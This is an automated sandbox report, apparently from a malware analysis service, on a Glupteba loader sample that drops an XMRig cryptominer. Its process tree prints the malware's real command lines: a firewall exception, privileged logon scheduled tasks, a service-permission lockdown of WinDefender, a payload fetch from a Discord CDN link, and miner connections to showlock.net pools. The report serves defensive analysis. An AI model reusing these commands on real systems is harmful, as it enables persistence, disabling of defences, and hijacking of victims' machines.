Overview

overview

10

Static

static

1

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    290s
  • max time network
    295s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    18-04-2024 23:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe

  • Size

    4.2MB

  • MD5

    a4734cab18c1867dd826d1bc77803448

  • SHA1

    1c7be6a15941733206382aa51d0f08e46e9e5d59

  • SHA256

    c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f

  • SHA512

    bcc9d94788b600592cfc08a9e004bc1d444aab2236b340d11a828342d338b2aca840240f278cdc228529d9f5534f59c15d0e100a0b188ece2a1eb37d0d3512ea

  • SSDEEP

    98304:5vWWHN1fH0B//M8+JHmTcLG3+4bVMShZOv4YroygT:517U//MsTcLGdFhUwYry

Score
10/10
gluptebaxmrigdiscoverydropperevasionloaderminerpersistencerootkittrojanupx

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba payload 36 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
    evasiontrojan
  • XMRig Miner payload 2 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Executes dropped EXE 4 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Windows security modification 2 TTPs 7 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Drops file in System32 directory 7 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
    "C:\Users\Admin\AppData\Local\Temp\c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4716
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2624
    • C:\Users\Admin\AppData\Local\Temp\c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
      "C:\Users\Admin\AppData\Local\Temp\c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe"
      2⤵
      • Windows security bypass
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4264
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1928
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4280
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:3544
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3704
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1816
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Manipulates WinMonFS driver.
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2692
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4632
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1744
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /delete /tn ScheduledUpdate /f
          4⤵
            PID:400
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4496
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4544
          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2456
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Creates scheduled task(s)
            PID:2248
          • C:\Windows\windefender.exe
            "C:\Windows\windefender.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1068
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3212
              • C:\Windows\SysWOW64\sc.exe
                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                6⤵
                • Launches sc.exe
                • Suspicious use of AdjustPrivilegeToken
                PID:1136
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:4632
          • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
            4⤵
              PID:3632
              • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 91e9e6ce-07ef-4900-a090-79ea3d566a62 --tls --nicehash -o showlock.net:443 --rig-id 91e9e6ce-07ef-4900-a090-79ea3d566a62 --tls --nicehash -o showlock.net:80 --rig-id 91e9e6ce-07ef-4900-a090-79ea3d566a62 --nicehash --http-port 3433 --http-access-token 91e9e6ce-07ef-4900-a090-79ea3d566a62 --randomx-wrmsr=-1
                5⤵
                  PID:2348
                • C:\Windows\rss\csrss.exe
                  C:\Windows\rss\csrss.exe -hide 2348
                  5⤵
                    PID:4528
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  4⤵
                    PID:3180
            • C:\Windows\windefender.exe
              C:\Windows\windefender.exe
              1⤵
              • Executes dropped EXE
              • Modifies data under HKEY_USERS
              PID:4764

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_areqgxhj.ef5.ps1
              Filesize

              1B

              MD5

              c4ca4238a0b923820dcc509a6f75849b

              SHA1

              356a192b7913b04c54574d18c28d46e6395428ab

              SHA256

              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

              SHA512

              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
              Filesize

              2.0MB

              MD5

              dcb505dc2b9d8aac05f4ca0727f5eadb

              SHA1

              4f633edb62de05f3d7c241c8bc19c1e0be7ced75

              SHA256

              61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

              SHA512

              31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
              Filesize

              281KB

              MD5

              d98e33b66343e7c96158444127a117f6

              SHA1

              bb716c5509a2bf345c6c1152f6e3e1452d39d50d

              SHA256

              5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

              SHA512

              705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
              Filesize

              5.2MB

              MD5

              4f649a57b7ddf3874c9a2163a73e9b07

              SHA1

              9c966520ba8233f13f168cade548baf5a30823ba

              SHA256

              830afffc7dd32e007736f0d97e8d02f68f80988266e68e3de3250aa189ac8491

              SHA512

              b2374bac551b0d4e87f38eb0090a9df0705a8600667fecba6a94e5c67ff93fc8b4707a905ce0e5ef0909e91b04dc01d74c21887a5b5958b8b2fd01faed253aac

              Download Submit

            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
              Filesize

              2KB

              MD5

              1c19c16e21c97ed42d5beabc93391fc5

              SHA1

              8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

              SHA256

              1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

              SHA512

              7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

              Download Submit

            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
              Filesize

              18KB

              MD5

              6f6315638b9778bff65e56af1f4734c5

              SHA1

              dfc39b25cfdeeb06345e928017963f5607d1bc5d

              SHA256

              d7a5cb24a31f4f9f22486199c48a914302679b632a4a0dc2f48eb74e94c4fa8f

              SHA512

              31929b1fcdbd2fc5b110d83c4438588f2cfb891b0925488beb85efd95ef354cbb48dc1c00f0544f80ebc340aeae5d66d8a71a21a73c7e544b05e2639d2528e5a

              Download Submit

            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
              Filesize

              18KB

              MD5

              1c09728f9d7cd1d73cb98c9095016323

              SHA1

              39c1d5784839c6df5dbfac2323e8c5ca64389eb0

              SHA256

              06e0ada22e6a4298f713cfd49d435b590ef52a1794a3b67b6f9ad26a9e7c6bfd

              SHA512

              87ffcaad6413fcc053d5965ed8c01672f77edc7118e25021d55b0b840e5eb129699368e691cafbc7b5349c9193fce78414c1785da954fbf2d1f79d642b056469

              Download Submit

            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
              Filesize

              18KB

              MD5

              0a94d08a62f276f5b2fcc3ce34011d48

              SHA1

              ea62469acfc8d818098da3ada23a6a1237f4b051

              SHA256

              fef2a46fb72c2a51a37b24179267e3a546ebf029caa07e6307acacc88b9ca5ad

              SHA512

              0d7fdbc3e705993ae328f9f9e526f95b6d30bdbdee56fc116d50f2ca84725f4b98d4db296732847fdca9cfb3056eff111df1f9b4188963bdc5f0721183269f4a

              Download Submit

            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
              Filesize

              18KB

              MD5

              61528b731d3472984581d8d1e82a6522

              SHA1

              ca5cf0f17e915bee81cb745159707eb9b45227cf

              SHA256

              bd596a3a0348ead63b699cd834d42ef69a62402828a4b173214f68922c74616f

              SHA512

              b524b0275f630a7c393b907de55910c1b068a558fafaee0cc0fcd87d4a301f0780433e4f5113e6739b077b4b59865b5c247124e00fffacf1cb0d575d85385054

              Download Submit

            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
              Filesize

              18KB

              MD5

              fe7115e7d0afb50e5d61d4b2c2864a89

              SHA1

              f7e6c2376a6705bc2f395d3eb60507d277c032d3

              SHA256

              ad334085dd3b96ed429f21f2ec16c902ca50e7601617fb0d0fab4c6deff3961b

              SHA512

              db559413e20b1f38512daab8f5cfde102085f69d20462375d6d013ff338c711a72c11842a18e29ab0d2e55a639bfeaef7d973fbf662285b4e41921cc682bf88b

              Download Submit

            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
              Filesize

              18KB

              MD5

              d65e806ef21107aae5701f096ca69c69

              SHA1

              21ffbb083ba99a64f2f1a1e239d372a0dad06ef8

              SHA256

              ecbf3a804513a5876ab359cda0342d746ef4e709a2f31744fe5e25f3e139118e

              SHA512

              8a469f57652386a5cf49ae1990fa792c36f09c4a733b6619d7d06fb95708e15285b1142303cbfbf494f6ca4f7c8a595ea4f0476cdfcf4ea6d252daaf299bd52a

              Download Submit

            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
              Filesize

              18KB

              MD5

              b5225cd481f8ab5920e8a413c906a68e

              SHA1

              8ab5411eaef4d56e3940f5446d877955e03b1cc4

              SHA256

              0e2dfb1169b8c21c44e0a2763eccf7a88ca44e2b99f6cc958749d211b02a6f4c

              SHA512

              34fea30a8d5bfc25509b31f6ce2936c0ee2bdf66035d239cdabbeecd09d1736f64bc7e18987715d2eb961ebd57cf2a70802801bfbc55db1eba143bba9996a4bb

              Download Submit

            • C:\Windows\rss\csrss.exe
              Filesize

              4.2MB

              MD5

              a4734cab18c1867dd826d1bc77803448

              SHA1

              1c7be6a15941733206382aa51d0f08e46e9e5d59

              SHA256

              c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f

              SHA512

              bcc9d94788b600592cfc08a9e004bc1d444aab2236b340d11a828342d338b2aca840240f278cdc228529d9f5534f59c15d0e100a0b188ece2a1eb37d0d3512ea

              Download Submit

            • C:\Windows\windefender.exe
              Filesize

              2.0MB

              MD5

              8e67f58837092385dcf01e8a2b4f5783

              SHA1

              012c49cfd8c5d06795a6f67ea2baf2a082cf8625

              SHA256

              166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

              SHA512

              40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

              Download Submit

            • memory/1068-1794-0x0000000000400000-0x00000000008DF000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/1816-820-0x000000006FB20000-0x000000006FE70000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/1816-819-0x000000006FAD0000-0x000000006FB1B000-memory.dmp

              Filesize

              300KB

              Download

            • memory/1816-826-0x000000007F600000-0x000000007F610000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1816-1039-0x0000000072DA0000-0x000000007348E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/1816-798-0x0000000004B90000-0x0000000004BA0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1816-796-0x0000000072DA0000-0x000000007348E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/1928-552-0x0000000072DA0000-0x000000007348E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/1928-310-0x0000000072DA0000-0x000000007348E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/1928-330-0x000000007F0C0000-0x000000007F0D0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1928-331-0x000000006FAD0000-0x000000006FB1B000-memory.dmp

              Filesize

              300KB

              Download

            • memory/1928-338-0x0000000006A90000-0x0000000006AA0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1928-337-0x0000000009000000-0x00000000090A5000-memory.dmp

              Filesize

              660KB

              Download

            • memory/1928-332-0x000000006FB20000-0x000000006FE70000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/1928-311-0x0000000008030000-0x000000000807B000-memory.dmp

              Filesize

              300KB

              Download

            • memory/1928-309-0x0000000007700000-0x0000000007A50000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/1928-308-0x0000000006A90000-0x0000000006AA0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1928-307-0x0000000006A90000-0x0000000006AA0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2348-2130-0x000002B472FB0000-0x000002B472FD0000-memory.dmp

              Filesize

              128KB

              Download

            • memory/2624-281-0x000000000A400000-0x000000000A408000-memory.dmp

              Filesize

              32KB

              Download

            • memory/2624-12-0x0000000007E40000-0x0000000007EA6000-memory.dmp

              Filesize

              408KB

              Download

            • memory/2624-14-0x00000000082A0000-0x00000000082BC000-memory.dmp

              Filesize

              112KB

              Download

            • memory/2624-15-0x00000000082F0000-0x000000000833B000-memory.dmp

              Filesize

              300KB

              Download

            • memory/2624-299-0x0000000072CA0000-0x000000007338E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/2624-276-0x000000000A410000-0x000000000A42A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/2624-34-0x0000000008760000-0x000000000879C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/2624-72-0x000000007F100000-0x000000007F110000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2624-73-0x000000000A250000-0x000000000A283000-memory.dmp

              Filesize

              204KB

              Download

            • memory/2624-11-0x0000000007DD0000-0x0000000007E36000-memory.dmp

              Filesize

              408KB

              Download

            • memory/2624-74-0x000000006F9B0000-0x000000006F9FB000-memory.dmp

              Filesize

              300KB

              Download

            • memory/2624-13-0x0000000007EB0000-0x0000000008200000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/2624-10-0x0000000007B50000-0x0000000007B72000-memory.dmp

              Filesize

              136KB

              Download

            • memory/2624-7-0x0000000072CA0000-0x000000007338E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/2624-9-0x00000000074B0000-0x0000000007AD8000-memory.dmp

              Filesize

              6.2MB

              Download

            • memory/2624-8-0x0000000006E70000-0x0000000006E80000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2624-6-0x0000000006E20000-0x0000000006E56000-memory.dmp

              Filesize

              216KB

              Download

            • memory/2624-83-0x000000000A470000-0x000000000A504000-memory.dmp

              Filesize

              592KB

              Download

            • memory/2624-75-0x000000006FA00000-0x000000006FD50000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/2624-82-0x0000000006E70000-0x0000000006E80000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2624-76-0x000000000A230000-0x000000000A24E000-memory.dmp

              Filesize

              120KB

              Download

            • memory/2624-81-0x000000000A290000-0x000000000A335000-memory.dmp

              Filesize

              660KB

              Download

            • memory/2624-65-0x00000000093D0000-0x0000000009446000-memory.dmp

              Filesize

              472KB

              Download

            • memory/2692-1802-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1830-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1844-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1842-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1840-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1838-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1836-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1046-0x0000000003800000-0x0000000003BF9000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/2692-1834-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1832-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1828-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1826-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1824-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1049-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1822-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1820-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1818-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1816-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1814-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1812-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1786-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1787-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1810-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1808-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1796-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1806-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1798-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1804-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/2692-1800-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/3632-2127-0x0000000000400000-0x00000000008E1000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/3704-578-0x000000006FAD0000-0x000000006FB1B000-memory.dmp

              Filesize

              300KB

              Download

            • memory/3704-793-0x0000000072DA0000-0x000000007348E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/3704-577-0x000000007F5F0000-0x000000007F600000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3704-556-0x0000000072DA0000-0x000000007348E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/3704-557-0x0000000006F00000-0x0000000006F10000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3704-579-0x000000006FB20000-0x000000006FE70000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/3704-584-0x0000000006F00000-0x0000000006F10000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4264-818-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/4264-825-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/4264-303-0x0000000003420000-0x0000000003825000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/4264-797-0x0000000003420000-0x0000000003825000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/4264-306-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/4264-1043-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/4632-1075-0x000000006FA30000-0x000000006FA7B000-memory.dmp

              Filesize

              300KB

              Download

            • memory/4632-1052-0x0000000008160000-0x00000000084B0000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/4632-1051-0x00000000073D0000-0x00000000073E0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4632-1074-0x000000007E5B0000-0x000000007E5C0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4632-1053-0x0000000072D00000-0x00000000733EE000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/4632-1050-0x00000000073D0000-0x00000000073E0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4632-1055-0x0000000008DB0000-0x0000000008DFB000-memory.dmp

              Filesize

              300KB

              Download

            • memory/4716-302-0x0000000005090000-0x000000000597B000-memory.dmp

              Filesize

              8.9MB

              Download

            • memory/4716-1-0x00000000032F0000-0x00000000036EC000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/4716-300-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/4716-3-0x0000000000400000-0x000000000300A000-memory.dmp

              Filesize

              44.0MB

              Download

            • memory/4716-2-0x0000000005090000-0x000000000597B000-memory.dmp

              Filesize

              8.9MB

              Download

            • memory/4764-1797-0x0000000000400000-0x00000000008DF000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/4764-1801-0x0000000000400000-0x00000000008DF000-memory.dmp

              Filesize

              4.9MB

              Download